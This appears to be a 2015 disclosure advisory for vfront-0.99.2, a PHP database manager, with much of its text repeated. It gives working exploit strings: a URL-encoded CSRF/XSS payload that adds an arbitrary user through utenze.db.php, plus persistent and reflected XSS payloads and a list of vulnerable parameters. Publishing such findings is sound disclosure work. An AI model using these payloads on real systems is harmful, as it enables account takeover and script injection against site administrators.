Product:
========================================================================
===========
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.
Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.
Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)
Exploit code(s):
===============
CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script
>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d
200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POS
T','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type',
'application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cogno
me%3dapparitionsec%26email%3dx (at) x (dot) com [email concealed]%26passwd%3dhacked%26passwd1%3dhacke
d');</script>&tabella=&uid=&data_dal=All&data_al=All
Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&
gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>
[+] Domains: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-VFRONT0602.txt
Vendor:
==============
www.vfront.org
Product:
========================================================================
===========
vfront-0.99.2 is a PHP web based MySQL & PostgreSQL database management application.
Advisory Information:
====================================
CSRF, Persistent XSS & reflected XSS
Vulnerability Detail(s):
=======================
CSRF:
=========
No CSRF token in place, therefore we can add arbitrary users to the system.
Persistent XSS:
================
variabili.php has multiple XSS vectors using POST method, one input field 'altezza_iframe_tabella_gid' will store XSS payload
into the MySQL database which will be run each time variabili.php is accessed from victims browser.
Persisted XSS stored in MySQL DB:
=================================
DB-----> vfront_vfront
TABLE-----> variabili
COLUMN------> valore (will contain our XSS)
Exploit code(s):
===============
CSRF code add arbitrary users to system:
=======================================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/log.php?op="/><script
>var xhr%3dnew XMLHttpRequest();xhr.onreadystatechange%3dfunction(){if(xhr.status%3d%3d
200){if(xhr.readyState%3d%3d4){alert(xhr.responseText);}}};xhr.open('POS
T','utenze.db.php?insert_new',true);xhr.setRequestHeader('Content-type',
'application/x-www-form-urlencoded');xhr.send('nome%3dhyp3rlinxe%26cogno
me%3dapparitionsec%26email%3dx (at) x (dot) com [email concealed]%26passwd%3dhacked%26passwd1%3dhacke
d');</script>&tabella=&uid=&data_dal=All&data_al=All
Persistent XSS:
================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php?feed=0&
gidfocus=0
Inject XSS into 'the altezza_iframe_tabella_gid' input field to store in database.
"/><script>alert(666)</script>
Reflected XSS(s):
=================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/query_editor.php?id=&
id_table=&id_campo="/><script>alert(666)</script>
XSS vulnerable input fields:
============================
http://localhost/vfront-0.99.2/vfront-0.99.2/admin/variabili.php
altezza_iframe_tabella_gid <------------- ( Persistent XSS )
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
Disclosure Timeline:
===================================
Vendor Notification: May 31, 2015
June 2, 2015 : Public Disclosure
Severity Level:
===================================
High
Description:
==========================================================
Request Method(s):
[+] GET & POST
Vulnerable Product:
[+] vfront-0.99.2
Vulnerable Parameter(s):
[+] altezza_iframe_tabella_gid
passo_avanzamento_veloce_gid
n_record_tabella_gid
search_limit_results_gid
max_tempo_edit_gid
home_redirect_gid
formati_attach_gid
default_group_ext_gid
cron_days_min_gid
id_campo
op
Affected Area(s): [+] Admin & MySQL DB
===============================================================
(hyp3rlinx)
[ reply ]